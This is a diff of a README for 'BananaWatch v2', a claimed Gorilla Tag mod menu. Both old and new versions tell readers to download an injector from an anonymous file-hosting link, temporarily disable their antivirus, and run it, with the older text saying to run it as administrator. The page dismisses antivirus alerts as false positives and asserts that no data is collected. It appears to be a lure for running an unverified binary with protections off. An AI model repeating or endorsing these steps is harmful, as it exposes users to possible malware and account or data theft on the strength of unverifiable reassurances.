Jacobishere1232324/BananaWatch-v2/README.md

 # BananaWatch-v2

-BananaWatch v2 is the upgraded version of the original BananaWatch, rebuilt with better stability, smoother performance, and a cleaner interface.
-Version two refines the original experience with improved reliability, quality-of-life changes, and a more polished feel while keeping the core features users enjoyed.
+BananaWatch v2 is the second release of the original BananaWatch, rebuilt with a focus on stability, usability, and clarity.
+This version improves performance, refines the interface, and addresses issues from the first release while preserving the core functionality users are familiar with.

+BananaWatch v2 is designed to be lightweight and user-controlled.
+It only runs when launched by the user and does not operate in the background when closed.

+Included Features

+BananaWatch v2 includes a curated set of optional mods intended to enhance the Gorilla Tag experience.
+All features are toggleable and fully controlled by the user.

+Current features include:

+Movement-related enhancements

+Visual and cosmetic options

+Player utilities and quality-of-life tools

+Menu customization options

+Stability and performance-focused features

+An interface preview is not available at this time.
+Development is ongoing, and additional features and improvements are planned for BananaWatch v3.

-How to Download & Use
+Download & Basic Usage

-Download the official injector here: https://gofile.io/d/X3mI0u
+Download the official injector from the link below: https://gofile.io/d/X3mI0u

-Extract the downloaded file.
+Extract the files to a known folder.

 Temporarily disable your antivirus.

-Run the injector as administrator.
+Run the injector and follow the on-screen instructions.

-Launch Gorilla Tag and inject BananaWatch v2.
+Only download BananaWatch v2 from official sources to avoid modified or unsafe copies.

-Antivirus Notice
+Antivirus & Safety Information

-Antivirus software may flag the injector as a false positive because it uses injection and memory modification methods similar to other mod tools.
-BananaWatch v2 does not collect personal data.
-Disabling AV prevents interference—re-enable it after use.
+Some antivirus programs may detect BananaWatch v2 or its injector as a false positive.
+This occurs because the software uses injection and memory interaction techniques that are commonly associated with malware behavior, even when the program itself is not malicious.

+BananaWatch v2 does not collect personal data, log keystrokes, or run hidden background processes.
+Temporarily disabling antivirus protection prevents false detections or file removal.
+Users should re-enable antivirus protection after use.